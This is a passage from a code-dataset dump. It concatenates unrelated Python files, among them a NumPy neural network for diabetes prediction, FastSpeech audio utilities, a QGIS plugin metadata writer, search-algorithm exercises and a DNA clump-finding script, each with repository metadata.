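# json_schema_extra only documents the generated OpenAPI schema; validation still comes from the field definitions above\n    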
}\n","repo_name":"edraj/middleware_skeleton","sub_path":"api/user/Requests/user_update_request.py","file_name":"user_update_request.py","file_ext":"py","file_size_in_byte":1124,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"26688129572","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Apr 11 17:36:44 2020\n\n@author: manpreetsi\n\"\"\"\n\n\n### 4th End to End DNN Code using NumPy only ####\n\n### This code has additional features & Hyperparameters of DNN namely:-\n# Dropout\n# Normalizing/Scaling Inputs\n# Initializaing weights with better condition\n# GDM ( Gradient Descent Momentum)\n# Mini- Batch\n\n\n# Train-Test Split\n# Check model performance using AUC (Area under the curve)\n# Generalised the network - user input to create layers number and neurons per layer in the network\n# Load file from your storage (csv or excel) and run the DNN on it !\n\n'''\nA network with following description:-\n20 ------> 40 ------> 80 -------> 10 -------> 1\ninput_layer Hiddent_Layer_1 Hiddent_Layer_2 Hiddent_Layer_3 Output Layer\nx w1,b1 w2,b2 w3,b3 w4,b4 y\n\nhidden layer functions are RelU\nFinal layer function is sigmoid\n\n'''\n\nimport numpy as np\nimport pandas as pd\nimport math\nimport matplotlib.pyplot as plt\nfrom sklearn import preprocessing\nfrom datetime import datetime\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import roc_auc_score\nfrom sklearn.metrics import accuracy_score\n\nprint(\"Enter all the parameters/values one-one by as aksed to build your customized Deep Neural Network !\")\nlearning_rate = float(input(\"Enter the learning rate\"))\nbeta1 = float(input(\"Emter beta1 value\"))\ntest_percentage = int(input(\"Percentage of test data, type numeric value only\"))\nbatch_size = int(input(\"Enter the batch size\\n\"))\nnetwork_size = int(input(\"Input the size of the network you want to create, excluding the input(A0) layer and output layer: \\n\"))\n \n### load file to get input features and y_true ( Diabetic prediction)\ndata=pd.read_csv(\"diabetes.csv\")\n \ny=data.loc[:,data.columns == \"Outcome\"]\nx=data.loc[:,data.columns != \"Outcome\"]\nlayer_nn,mini_batches = [],[]\n\nlayer_nn, mini_batches,cost_array, param, Z_all, A_all, dZ_all, Vdw,Vdb,nw_size,x_train,x_test,y_train,y_test = dnn_preprocessing(x,y,test_percentage,batch_size,network_size )\n\n### Run the DNN\nprint(\"Network Modeling started at \", datetime.now())\ncost_array,Z_all,A_all,dZ_all,Vdw,Vdb, param,alpha = run_nn_epochs(Z_all, A_all,param,cost_array,dZ_all,Vdw,Vdb,nw_size,layer_nn,learning_rate,mini_batches)\n\n### run the NN for Validation data (to predict and check) and check it's AUC\nauc_nn,Z_test_all,A_test_all = model_validation(param,x_test,y_test,nw_size)\nprint(\"DNN auc value is : \", auc_nn) ## .838\n\n### Cost Graph Function\ncost_array = cost_graph(cost_array)\nprint(\"Network Modeling completed at \", datetime.now(), \"minimum cost function value of \",min(cost_array))\n\n\ndef dnn_preprocessing(x,y,test_percentage,batch_size,network_size):\n \n layer_nn = []\n mini_batches =[]\n \n ### DF to NumPy & transposing the array because train_test_split takes columns are features and not rows & scsling the x's !\n x= x.to_numpy()\n y= y.to_numpy()\n \n x = preprocessing.scale(x)\n \n ### Creating the DNN Architecture\n layer_nn = nn_arch(int(x.shape[1]),network_size)\n \n nw_size = len(layer_nn)\n \n ## Splitting the train and test data\n x_train,x_test,y_train,y_test = 
splitting_train_test(x,y,test_percentage)\n \n ## Variable intialization\n cost_array, param, Z_all, A_all, dZ_all, Vdw,Vdb = var_init(layer_nn)\n \n ### Mini-Btches creation\n mini_batches = create_mini_batch(x_train,y_train,batch_size)\n \n len(mini_batches)\n \n return layer_nn, mini_batches,cost_array, param, Z_all, A_all, dZ_all, Vdw,Vdb,nw_size,x_train,x_test,y_train,y_test \n\ndef nn_arch(input_layer_size,network_size):\n l1= input_layer_size\n ## feeding the input layer neurons !\n layer_nn.append(int(x.shape[1]))\n \n for i in range(0,network_size):\n print(\"Enter number of neurons for hidden layer\", i+1 ,\":\") \n item = int(input())\n layer_nn.append(item)\n \n ## feeding the output layer neuron !\n layer_nn.append(int(1))\n print(\"Your network has \", len(layer_nn)-2,\" and 2 layers of input and output each.\\n\")\n \n return layer_nn\n\ndef splitting_train_test(x,y,test_percentage):\n \n test_ratio = test_percentage/100\n \n ##### Train - Test Split\n x_train,x_test,y_train,y_test = train_test_split(x,y,test_size=test_ratio, stratify = y)\n\n ### Transposing again to make it fit for the NN design\n x_train = x_train.T\n x_test = x_test.T\n y_train = y_train.T\n y_test = y_test.T\n \n return x_train,x_test,y_train,y_test\n\ndef create_mini_batch(x_train,y_train,batch_size):\n ## create mini bacthes creation begins\n mini_batch_size = batch_size\n mini_batches = []\n u = x_train.shape[1]\n \n perm = list(np.random.permutation(u))\n shuffled_x = x_train[:,perm]\n shuffled_y = y_train[:,perm]\n \n num_min_batches = math.floor(u/mini_batch_size)\n \n for k in range(0,num_min_batches):\n mini_batch_x = shuffled_x[:,k*mini_batch_size:(k+1)*mini_batch_size]\n mini_batch_y = shuffled_y[:, k*mini_batch_size:(k+1)*mini_batch_size]\n \n mini_batch=(mini_batch_x, mini_batch_y)\n mini_batches.append(mini_batch)\n \n ## handling the remaning datapoints\n if u % mini_batch_size != 0:\n mini_batch_x = shuffled_x[:, num_min_batches*mini_batch_size: ]\n mini_batch_y = shuffled_y[:, num_min_batches*mini_batch_size: ]\n mini_batch = (mini_batch_x, mini_batch_y)\n mini_batches.append(mini_batch)\n return mini_batches\n\ndef run_nn_epochs(Z_all, A_all,param,cost_array,dZ_all,Vdw,Vdb,nw_size,layer_nn,learning_rate, mini_batches):\n num_batches = len(mini_batches)\n alpha = learning_rate\n \n for epoch in range(1,1001):\n cost = 0 \n for num in range(0,num_batches):\n \n x_min = mini_batches[num][0] \n y_min = mini_batches[num][1] \n \n Z_all, A_all = forward_prop(param,x_min,y_min,nw_size)\n A_all['A'+str(0)]=x_min\n \n temp = comp_cost(A_all,y_min,nw_size)\n cost += temp\n \n dZ_all,Vdw,Vdb = backward_prop(layer_nn,A_all,y_min,param,Z_all,beta1)\n \n param = param_update(Vdw,Vdb,param,alpha,nw_size)\n \n \n cost = cost/num_batches \n cost_array.append(cost)\n \n #alpha0 = (1/(1 + (decay_rate*epoch)))*alpha\n #alpha = alpha0\n \n \n return (cost_array,Z_all,A_all,dZ_all,Vdw,Vdb, param,alpha) \n\ndef model_validation(param,x_test,y_test,nw_size):\n \n Z_test_All, A_test_all = {},{}\n Z_test_all, A_test_all = forward_prop_test(param,x_test,y_test,nw_size)\n y_test_hat = A_test_all['A'+str(nw_size-1)]\n auc_nn = round(roc_auc_score(np.squeeze(y_test),np.squeeze(y_test_hat)),3)\n return auc_nn,Z_test_all,A_test_all\n\ndef cost_graph(cost_array):\n \n cost_array= np.array(cost_array)\n cost_array = cost_array[np.isfinite(cost_array)]\n xs = np.arange(1,len(cost_array)+1)\n \n ### Cost Graph #### \n plt.plot(xs,cost_array)\n plt.xlabel('iterations')\n plt.ylabel('Cost Function')\n plt.show()\n 
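# a steadily falling curve means the network is still converging; a long flat tail suggests lowering the learning rate or stopping earlier\n    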
print(\"################################# Cost Graph has been plotted ! ################################# \")\n return cost_array\n\ndef param_init(layers_nn):\n\n np.random.seed(1)\n param={}\n size_nn = len(layer_nn)\n for i in range(1,size_nn):\n param['W' + str(i)] = np.random.random((layer_nn[i], layer_nn[i-1])) * np.sqrt(2/layer_nn[i-1]) ## initializing appropriate weights \n param['b' + str(i)] = np.zeros((layer_nn[i],1))\n \n ### Checker to check the dimensions of weights w & bias b ###\n assert(param['W'+str(i)].shape == (layer_nn[i], layer_nn[i-1]))\n assert(param['b'+str(i)].shape == (layer_nn[i],1))\n \n return param\n\ndef var_init(layer_nn):\n \n cost_array = []\n \n param={}\n param = param_init(layer_nn)\n \n Z_all, A_all = {},{}\n dZ_all,Vdw, Vdb = {},{},{}\n return cost_array, param, Z_all, A_all, dZ_all, Vdw,Vdb\n\ndef relu(x):\n return (x>0) * x\n \ndef sigmoid(x):\n sig= 1/(1+ np.exp(-x))\n return sig \n\ndef relu_deriv(x):\n print(x)\n return x>0\n \ndef forward_prop(param,x,y,size_nn):\n\n A = x\n A_prev = A \n A_all ={}\n Z_all = {} \n \n for i in range (1,size_nn-1):\n W = param['W'+str(i)]\n A_prev = A\n b = param['b' + str(i)]\n \n Z = np.dot(W,A_prev) + b \n A = relu(Z)\n \n ### Implemented Dropout with 70% probability\n dropout_mask = np.random.rand(A.shape[0],A.shape[1]) < .7 ## 30% neurons will be switched off \n A *= dropout_mask\n \n Z_all['Z' + str(i)] = Z\n A_all['A' + str(i)] = A \n \n ## calculate output layer Z & A using Sigmoid ## \n W = param['W'+str(size_nn - 1)]\n A_prev = A_all['A' + str(size_nn-2)]\n b = param['b' + str(size_nn - 1)]\n \n Z= np.dot(W,A_prev) + b\n A = sigmoid(Z)\n \n Z_all['Z' + str(size_nn-1)] = Z\n A_all['A'+str(size_nn-1)] = A\n \n return (Z_all, A_all) \n\ndef comp_cost(A_all,y,size_nn):\n \n y_hat = A_all['A'+str(size_nn-1)]\n y_act = y\n m = np.size(y)\n \n cost = - np.sum((y_act*np.log(y_hat)) + (1-y_act)*np.log(1-y_hat))/m \n np.squeeze(cost)\n \n return cost \n\ndef backward_prop(layer_nn,A_all,y,param,Z_all,beta1):\n size_nn = len(layer_nn)\n m = np.size(y)\n dZ_all,dW_all, db_all = {},{},{}\n Vdw, Vdb, Sdw, Sdb = {},{},{},{}\n \n dz = A_all['A'+str(size_nn-1)] - y\n dw = (np.dot(dz,A_all['A'+str(size_nn-2)].T))/m\n db = (np.sum(dz, axis=1, keepdims=True))/m\n dZ_all['dZ' + str(size_nn-1)] = dz\n dW_all['dW' + str(size_nn-1)] = dw\n db_all['db' + str(size_nn-1)] = db\n \n for i in range(size_nn-2,0,-1): \n dz = np.dot(param['W'+str(i+1)].T,dZ_all['dZ' + str(i+1)])\n dz = dz*relu_deriv(Z_all['Z' + str(i)])\n dw = np.dot(dz,A_all['A' + str(i-1)].T)/m\n db = np.sum(dz,axis=1,keepdims=True)/m \n dZ_all['dZ' + str(i)] = dz\n dW_all['dW' + str(i)] = dw\n db_all['db' + str(i)] = db \n \n ## initializaing Gradient Momemtum Parameters\n for i in range(1,size_nn):\n Vdw[\"dW\"+ str(i)] = np.zeros_like(dW_all[\"dW\" + str(i)])\n Vdb[\"db\" + str(i)] = np.zeros_like(db_all[\"db\" + str(i)])\n \n ## updatng Gradient Momentum parameters\n for i in range(1,size_nn):\n Vdw[\"dW\"+ str(i)] = beta1*Vdw[\"dW\"+ str(i)] + (1-beta1)*dW_all[\"dW\"+ str(i)]\n Vdb[\"db\"+ str(i)] = beta1*Vdb[\"db\"+ str(i)] + (1-beta1)*db_all[\"db\"+ str(i)]\n \n \n return (dZ_all,Vdw,Vdb)\n \ndef param_update(Vdw,Vdb,param,alpha,size_nn):\n \n alpha = .01\n for i in range(1,size_nn):\n param['W'+str(i)] -= alpha*Vdw['dW'+str(i)] # using GDM parameters to updated weight\n param['b'+str(i)] -= alpha*Vdb['db'+str(i)] # using GDM parameters to updated bias\n \n return param\n\ndef forward_prop_test(param,x,y,size_nn):\n\n A = x\n A_prev = A \n A_all ={}\n Z_all = 
{} \n \n for i in range (1,size_nn-1):\n W = param['W'+str(i)]\n A_prev = A\n b = param['b' + str(i)]\n \n Z = np.dot(W,A_prev) + b \n A = relu(Z)\n \n Z_all['Z' + str(i)] = Z\n A_all['A' + str(i)] = A \n \n ## calculate output layer Z & A using Sigmoid ## \n W = param['W'+str(size_nn - 1)]\n A_prev = A_all['A' + str(size_nn-2)]\n b = param['b' + str(size_nn - 1)]\n \n Z= np.dot(W,A_prev) + b\n A = sigmoid(Z)\n \n Z_all['Z' + str(size_nn-1)] = Z\n A_all['A'+str(size_nn-1)] = A\n \n return (Z_all, A_all) \n\n\n\n","repo_name":"singhmnprt01/Deep-Neural-Network-using-NumPy","sub_path":"4_DNN Numpy with General_NN__csv_excel_data_load/4th_end_to_end_dnn.py","file_name":"4th_end_to_end_dnn.py","file_ext":"py","file_size_in_byte":11786,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"1715283279","text":"\"\"\" from https://github.com/NVIDIA/tacotron2 \"\"\"\n\nimport torch\nimport numpy as np\nfrom scipy.io.wavfile import read\nfrom scipy.io.wavfile import write\n\nimport audio.stft as stft\nimport audio.hparams_audio as hparams\nfrom audio.audio_processing import griffin_lim\n\n_stft = stft.TacotronSTFT(\n hparams.filter_length, hparams.hop_length, hparams.win_length,\n hparams.n_mel_channels, hparams.sampling_rate, hparams.mel_fmin,\n hparams.mel_fmax)\n\n\ndef load_wav_to_torch(full_path):\n sampling_rate, data = read(full_path)\n return torch.FloatTensor(data.astype(np.float32)), sampling_rate\n\n\ndef get_mel(filename):\n audio, sampling_rate = load_wav_to_torch(filename)\n if sampling_rate != _stft.sampling_rate:\n raise ValueError(\"{} {} SR doesn't match target {} SR\".format(\n sampling_rate, _stft.sampling_rate))\n audio_norm = audio / hparams.max_wav_value\n audio_norm = audio_norm.unsqueeze(0)\n audio_norm = torch.autograd.Variable(audio_norm, requires_grad=False)\n melspec = _stft.mel_spectrogram(audio_norm)\n melspec = torch.squeeze(melspec, 0)\n # melspec = torch.from_numpy(_normalize(melspec.numpy()))\n\n return melspec\n\n\ndef get_mel_from_wav(audio):\n sampling_rate = hparams.sampling_rate\n if sampling_rate != _stft.sampling_rate:\n raise ValueError(\"{} {} SR doesn't match target {} SR\".format(\n sampling_rate, _stft.sampling_rate))\n audio_norm = audio / hparams.max_wav_value\n audio_norm = audio_norm.unsqueeze(0)\n audio_norm = torch.autograd.Variable(audio_norm, requires_grad=False)\n melspec = _stft.mel_spectrogram(audio_norm)\n melspec = torch.squeeze(melspec, 0)\n\n return melspec\n\n\ndef inv_mel_spec(mel, out_filename, griffin_iters=60):\n mel = torch.stack([mel])\n # mel = torch.stack([torch.from_numpy(_denormalize(mel.numpy()))])\n mel_decompress = _stft.spectral_de_normalize(mel)\n mel_decompress = mel_decompress.transpose(1, 2).data.cpu()\n spec_from_mel_scaling = 1000\n spec_from_mel = torch.mm(mel_decompress[0], _stft.mel_basis)\n spec_from_mel = spec_from_mel.transpose(0, 1).unsqueeze(0)\n spec_from_mel = spec_from_mel * spec_from_mel_scaling\n\n audio = griffin_lim(torch.autograd.Variable(\n spec_from_mel[:, :, :-1]), _stft.stft_fn, griffin_iters)\n\n audio = audio.squeeze()\n audio = audio.cpu().numpy()\n audio_path = out_filename\n write(audio_path, hparams.sampling_rate, audio)\n","repo_name":"xcmyz/FastSpeech","sub_path":"audio/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":2432,"program_lang":"python","lang":"en","doc_type":"code","stars":822,"dataset":"github-code","pt":"77"} +{"seq_id":"3217018771","text":"import os.path\nimport pathlib\nimport re\n\nfrom os import 
getenv\nimport platform\nfrom typing import List\n\nfrom qgis.PyQt.QtCore import QStandardPaths, QSettings\nfrom qgis.core import QgsApplication\n\nfrom qgis.core import QgsUserProfileManager\n\n\ndef userProfileManager() -> QgsUserProfileManager:\n    globalsettingsfile = None\n    configLocalStorageLocation = None\n\n    if globalsettingsfile is None:\n        globalsettingsfile: str = getenv(\"QGIS_GLOBAL_SETTINGS_FILE\")\n\n    if globalsettingsfile is None:\n        startupPaths = QStandardPaths.locateAll(QStandardPaths.AppDataLocation, \"qgis_global_settings.ini\")\n        if startupPaths:\n            globalsettingsfile = startupPaths[0]\n\n    if globalsettingsfile is None:\n        default_globalsettingsfile = QgsApplication.resolvePkgPath() + \"/resources/qgis_global_settings.ini\"\n        if os.path.isfile(default_globalsettingsfile):\n            globalsettingsfile = default_globalsettingsfile\n\n    if configLocalStorageLocation is None:\n        if globalsettingsfile is not None:\n            globalSettings = QSettings(globalsettingsfile, QSettings.IniFormat)\n            if globalSettings.contains(\"core/profilesPath\"):\n                configLocalStorageLocation = globalSettings.value(\"core/profilesPath\", \"\")\n\n    if configLocalStorageLocation is None:\n        home = pathlib.Path('~').expanduser()\n        basePath = None\n        if platform.system() == 'Windows':\n            basePath = home / 'AppData/Roaming/QGIS/QGIS3'\n        elif platform.system() == 'Linux':\n            basePath = home / '.local/share/QGIS/QGIS3'\n        if basePath is None:\n            raise NotImplementedError(f'No QGIS basePath for {platform.system()}')\n\n        configLocalStorageLocation = basePath.as_posix()\n\n    rootProfileFolder = QgsUserProfileManager.resolveProfilesFolder(configLocalStorageLocation)\n    return QgsUserProfileManager(rootProfileFolder)\n\n\nclass QGISMetadataFileWriter(object):\n    \"\"\"\n    A class to store and write the QGIS plugin metadata.txt\n    For details see:\n    https://docs.qgis.org/3.16/en/docs/pyqgis_developer_cookbook/plugins/plugins.html#plugin-metadata-table\n    \"\"\"\n\n    def __init__(self):\n        self.mName = ''\n        self.mDescription = ''\n        self.mVersion = ''\n        self.mQgisMinimumVersion = '3.8'\n        self.mQgisMaximumVersion = '3.99'\n        self.mAuthor = ''\n        self.mAbout = ''\n        self.mEmail = ''\n        self.mHomepage = ''\n        self.mIcon = ''\n        self.mTracker = ''\n        self.mRepository = ''\n        self.mIsExperimental = ''\n        self.mHasProcessingProvider: bool = False\n        self.mTags: List[str] = []\n        self.mCategory: str = ''\n        self.mChangelog: str = ''\n        self.mPlugin_dependencies: List[str] = []\n\n    def validate(self) -> bool:\n        return True\n\n    def formatTag(self, tag: str, value, sep: str = ', '):\n        s = f'{tag}='\n        if isinstance(value, list):\n            s += f'{sep}'.join(value)\n        else:\n            s += f'{value}'\n        return s\n\n    def metadataString(self) -> str:\n        assert self.validate()\n\n        lines = ['[general]']\n        lines.append(self.formatTag('name', self.mName))\n        lines.append(self.formatTag('author', self.mAuthor))\n        if self.mEmail:\n            lines.append(self.formatTag('email', self.mEmail))\n\n        lines.append(self.formatTag('description', self.mDescription))\n        lines.append(self.formatTag('version', self.mVersion))\n\n        lines.append(self.formatTag('qgisMinimumVersion', self.mQgisMinimumVersion))\n        lines.append(self.formatTag('qgisMaximumVersion', self.mQgisMaximumVersion))\n        lines.append(self.formatTag('about', re.sub('\\n', '', self.mAbout)))\n\n        lines.append(self.formatTag('icon', self.mIcon))\n        lines.append(self.formatTag('tags', self.mTags))\n        lines.append(self.formatTag('category', self.mCategory))\n\n        if self.mHasProcessingProvider:\n            lines.append('hasProcessingProvider=yes')\n        else:\n            
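# metadata.txt expects the literal strings yes/no for this flag, not a Python boolean\n            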
lines.append('hasProcessingProvider=no')\n        lines.append(self.formatTag('homepage', self.mHomepage))\n\n        if self.mTracker:\n            lines.append(self.formatTag('tracker', self.mTracker))\n\n        if self.mRepository:\n            lines.append(self.formatTag('repository', self.mRepository))\n\n        if isinstance(self.mIsExperimental, bool):\n            lines.append(self.formatTag('experimental', self.mIsExperimental))\n\n        if len(self.mPlugin_dependencies) > 0:\n            lines.append(self.formatTag('plugin_dependencies', self.mPlugin_dependencies))\n        # lines.append('deprecated={}'.format(self.mIsDeprecated))\n        lines.append('')\n        lines.append(self.formatTag('changelog', self.mChangelog))\n\n        return '\\n'.join(lines)\n\n    \"\"\"\n    [general]\n    name=dummy\n    description=dummy\n    version=dummy\n    qgisMinimumVersion=dummy\n    qgisMaximumVersion=dummy\n    author=dummy\n    about=dummy\n    email=dummy\n    icon=dummy\n    homepage=dummy\n    tracker=dummy\n    repository=dummy\n    experimental=False\n    deprecated=False\n    tags=remote sensing, raster, time series, data cube, landsat, sentinel\n    category=Raster\n    \"\"\"\n\n    def writeMetadataTxt(self, path: str):\n        with open(path, 'w', encoding='utf-8', newline='\\n') as f:\n            f.write(self.metadataString())\n","repo_name":"EnMAP-Box/qgispluginsupport","sub_path":"qps/make/deploy.py","file_name":"deploy.py","file_ext":"py","file_size_in_byte":5338,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"77"} +{"seq_id":"32839019011","text":"def cipher_check_3(X):\n    result = []\n    if X < 1000 and X >= 100:\n        cipher = [100, 10, 1]\n        temp = 0\n        for c in cipher:\n            temp = X / c\n            temp = int(temp)\n            result.append(temp)\n            X = X - (temp * c)\n    return result\n\n","repo_name":"Lnkyoung16/number_guessing_game","sub_path":"cipher_check_3.py","file_name":"cipher_check_3.py","file_ext":"py","file_size_in_byte":277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"34775544675","text":"from data_stark import lista_personajes\n#TALLEST\npersonaje_mas_alto = lista_personajes[0]\naltura_maxima = float(personaje_mas_alto[\"altura\"])\n\nfor heroe in lista_personajes:\n    heroe[\"altura\"] = float(heroe[\"altura\"])\n    if(heroe[\"altura\"] > altura_maxima):\n        altura_maxima = heroe[\"altura\"]\n        personaje_mas_alto = heroe\n\nprint(\"Tallest: {0} - Name: {1}\".format(altura_maxima,personaje_mas_alto[\"nombre\"]))\n\n#SHORTEST\n\npersonaje_mas_bajo = lista_personajes[0]\naltura_minima = float(personaje_mas_bajo[\"altura\"])\n\nfor heroe in lista_personajes:\n    heroe[\"altura\"] = float(heroe[\"altura\"])\n    if(heroe[\"altura\"] < altura_minima):\n        altura_minima = heroe[\"altura\"]\n        personaje_mas_bajo = heroe\n\nprint(\"Shortest: {0} - Name: {1}\".format(altura_minima,personaje_mas_bajo[\"nombre\"]))\n\n# AVERAGE HEIGHT\n\ncantidad_heroes = 0\nacumulador_altura = 0\n\nfor heroe in lista_personajes:\n    cantidad_heroes = cantidad_heroes + 1\n    acumulador_altura = acumulador_altura + heroe[\"altura\"]\n\nprint(\"Average: {2} - Count: {0} - accumulator: {1}\".format(cantidad_heroes,acumulador_altura,acumulador_altura/cantidad_heroes))\n\n\n","repo_name":"MarianoIzarriaga/ProgramacionUTN","sub_path":"Ejercicio_marvel00/marvel.py","file_name":"marvel.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"74213014008","text":"'''\r\nBreadth-first Search from AlgoExpert.io\r\nJanuary 2021 Jakub Kazimierski\r\n'''\r\n\r\nclass Node:\r\n    def __init__(self, name):\r\n        self.children = []\r\n        self.name = name\r\n\r\n    def 
addChild(self, name):\r\n self.children.append(Node(name))\r\n return self\r\n\r\n def returnChild(self, name):\r\n '''\r\n Method created for tests (not best one)\r\n '''\r\n for child in self.children:\r\n if child.name == name:\r\n return child\r\n\r\n\r\n def breadthFirstSearch(self, array):\r\n '''\r\n You're given a Node class that has a name\r\n and an array of optional children nodes.\r\n When put together, nodes form an acyclic tree-like\r\n structure.\r\n\r\n Implement the breadthFirstSearch method on the Node class,\r\n which takes in an empty array, traverses the tree using\r\n the breadth-first Search approach (specifically navigating\r\n the tree from left to right), stores all of the nodes' names\r\n in the input array, and returns it.\r\n '''\r\n \r\n # implementation based on queue (fifo)\r\n # time O(v+e) for each vertex edges are checked\r\n # v-vertices e-edges| space O(n)\r\n queue = []\r\n\r\n array.append(self.name)\r\n\r\n queue.extend(self.children)\r\n\r\n while len(queue) != 0:\r\n node = queue.pop(0)\r\n array.append(node.name)\r\n queue.extend(node.children)\r\n\r\n return array\r\n\r\ndef setUp():\r\n '''\r\n Returns graph for tests\r\n '''\r\n graph = Node('A')\r\n graph.addChild('B')\r\n graph.addChild('C')\r\n graph.addChild('D')\r\n \r\n node_B = graph.returnChild('B')\r\n node_B.addChild('E')\r\n node_B.addChild('F')\r\n \r\n node_F = node_B.returnChild('F')\r\n node_F.addChild('I')\r\n node_F.addChild('J')\r\n\r\n node_D = graph.returnChild('D')\r\n node_D.addChild('G')\r\n node_D.addChild('H')\r\n\r\n node_G = node_D.returnChild('G')\r\n node_G.addChild('K')\r\n\r\n\r\n return graph ","repo_name":"JakubKazimierski/PythonPortfolio","sub_path":"AlgoExpert_algorithms/Medium/Breadth_first_Search/Breadth_first_Search.py","file_name":"Breadth_first_Search.py","file_ext":"py","file_size_in_byte":2016,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"77"} +{"seq_id":"39212581267","text":"# coding: utf-8\n\n\"\"\"\n Creditas OpenAPI\n\n This is specification of the Creditas OpenAPI. It contains definitions of Creditas banking services exposed via API accessible on the internet. 
# noqa: E501\n\n    OpenAPI spec version: 1.0.0\n    Contact: is@creditas.cz\n    Generated by: https://github.com/swagger-api/swagger-codegen.git\n\"\"\"\n\n\nfrom setuptools import setup, find_packages  # noqa: H301\nfrom pathlib import Path\n\nNAME = \"creditas\"\nVERSION = \"1.0.0.1\"\n# To install the library, run the following\n#\n# python setup.py install\n#\n# prerequisite: setuptools\n# http://pypi.python.org/pypi/setuptools\n\nREQUIRES = [\n    \"certifi>=2017.4.17\",\n    \"python-dateutil>=2.1\",\n    \"six>=1.10\",\n    \"urllib3>=1.23\"\n]\n \nthis_directory = Path(__file__).parent\nlong_description = (this_directory / \"README.md\").read_text()\n\n\nsetup(\n    name=NAME,\n    version=VERSION,\n    description=\"Creditas OpenAPI\",\n    author_email=\"is@creditas.cz\",\n    url=\"\",\n    keywords=[\"Swagger\", \"Creditas OpenAPI\"],\n    install_requires=REQUIRES,\n    packages=find_packages(),\n    include_package_data=True,\n    long_description=long_description,\n    long_description_content_type=\"text/markdown\",\n)\n","repo_name":"peberanek/creditas","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"43816868592","text":"class Solution:\n    \"\"\"\n    Given an array of integers nums which is sorted in ascending order, and an integer target, write a function to search target in nums.\n    If target exists, then return its index. Otherwise, return -1.\n    \"\"\"\n    def search(self, nums: List[int], target: int) -> int:\n        l, r = 0, len(nums) - 1\n        \n        # Until l and r converge on a target\n        while l <= r:\n            m = l + ((r - l) // 2) # Apparently (l + r) // 2 can lead to overflow\n            if nums[m] > target:\n                r = m - 1\n            elif nums[m] < target:\n                l = m + 1\n            else:\n                return m\n        return -1","repo_name":"aroy105/LeetCode","sub_path":"BinarySearch/704-binary_search.py","file_name":"704-binary_search.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"30142482309","text":"genome = \"CGGACTCGACAGATGTGAAGAACGACAATGTGAAGACTCGACACGACAGAGTGAAGAGAAGAGGAAACATTGTAA\"\nwith open(\"E_coli.txt\") as file:\n    for line in file:\n        if line.startswith(\"A\") or line.startswith(\"T\") or line.startswith(\"G\") or line.startswith(\"C\"):\n            genome += line\n        else:\n            k, length, times = line.split()\n            k = int(k)\n            length = int(length)\n            times = int(times)\nk = 9\nlength = 500\ntimes = 3\n\n\ndef build_k_mer_frequency_dict(genome):\n    k_mers = {}\n    for i in range(len(genome) - k):\n        current_k_mer = genome[i:i+k]\n        if current_k_mer not in k_mers:\n            k_mers[current_k_mer] = [i]\n        else:\n            k_mers[current_k_mer].append(i)\n    return k_mers\n\n\ndef calculate_amount_of_clumps(k, length, times, k_mers_dict):\n    result = []\n    for key, value in k_mers_dict.items():\n        if len(value) >= times:\n            for index in range(len(value) - times + 1):\n                total = length - k\n                potential_clump = value[index:index+times]\n                start = potential_clump[0]\n                end = potential_clump[-1]\n                if end - start <= total:\n                    result.append(key)\n                    break\n\n    return result\n\n\n\n\n\n\n\nk_mers_dict = build_k_mer_frequency_dict(genome)\nresult = calculate_amount_of_clumps(k=k, k_mers_dict=k_mers_dict, length=length, times=times)\nprint(result)\nprint(len(result))\n\n#After optimisation, it now needs around 4 seconds! Much better :). This does require a more algorithmic approach though,\n#and may pose a significant challenge to unseasoned practitioners. Can it get faster? For sure! 
But I'd rather deal with the\n#other materials of the course, and besides, there are enough free tools on the internet, who do the same job :)\n#Hint: Try writing it in Cython, C++ or even C! If you opt for a better algorithmic approach and confer to numba rules, you may\n#even get it to milliseconds range! But is the roughly 3 seconds speedup worth the time investment?","repo_name":"Nikikapralov/Bioinformatics","sub_path":"Specialisation/Finding hidden messages in DNA/Week 1/clump_finding/efficient_clump_finding.py","file_name":"efficient_clump_finding.py","file_ext":"py","file_size_in_byte":2024,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"39835138663","text":"import pandas as pd\nimport os\n\nunivs = [\"American75\",\"Bowdoin47\",\"Cornell5\",\"Haverford76\",\"Maine59\",\"Notre Dame57\",\"Rochester38\",\"Tennessee95\",\"UCF52\",\"UIllinois20\",\"Vassar85\",\"Williams40\",\n\"Amherst41\",\"Brandeis99\",\"Dartmouth6\",\"Howard90\",\"Maryland58\",\"Oberlin44\",\"Rutgers89\",\"Texas80\",\"UCLA26\",\"UMass92\",\"Vermont70\",\"Wisconsin87\",\n\"Brown11\",\"Duke14\",\"Indiana69\",\"Mich67\",\"Oklahoma97\",\"Santa74\",\"Texas84\",\"UCSB37\",\"UNC28\",\"Villanova62\",\"Yale4\",\n\"Auburn71\",\"Bucknell39\",\"Emory27\",\"JMU79\",\"Michigan23\",\"Penn94\",\"Simmons81\",\"Trinity100\",\"UCSC68\",\"UPenn7\",\"Virginia63\",\n\"BC17\",\"Cal65\",\"FSU53\",\"Johns 